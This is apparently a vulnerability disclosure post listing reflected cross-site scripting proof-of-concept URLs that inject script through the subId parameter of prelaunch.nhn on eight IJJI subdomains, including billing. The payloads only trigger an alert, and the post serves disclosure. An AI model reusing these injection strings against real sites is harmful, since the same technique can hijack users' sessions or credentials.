Type: Non-persistent
Criteria: None
This post is a continuation of the disclosure of prelaunch.nhn script vulnerabilities across all subdomains on the IJJI service. We finish today with 8 more; totalling 17 copies of the same script.
10) Miscellaneous
http://misc.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//
11) Bulletin Board System
http://bbs.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//
12) Channel
http://channel.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//
13) Billing
http://billing.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//
14) HTTPS Billing
https://billing.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//
15) Facebook
http://facebook.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//
16) Message
http://message.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//
17) Avatar
http://avatar.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//
It is important to note that if the launcher plugin is installed for either IE or Firefox then one of the following will occur:
If the user is authenticated, they will be alerted:
This channel does not exist
If the user is not authenticated, then they will be redirected to login (there is a timed delay on with Firefox).
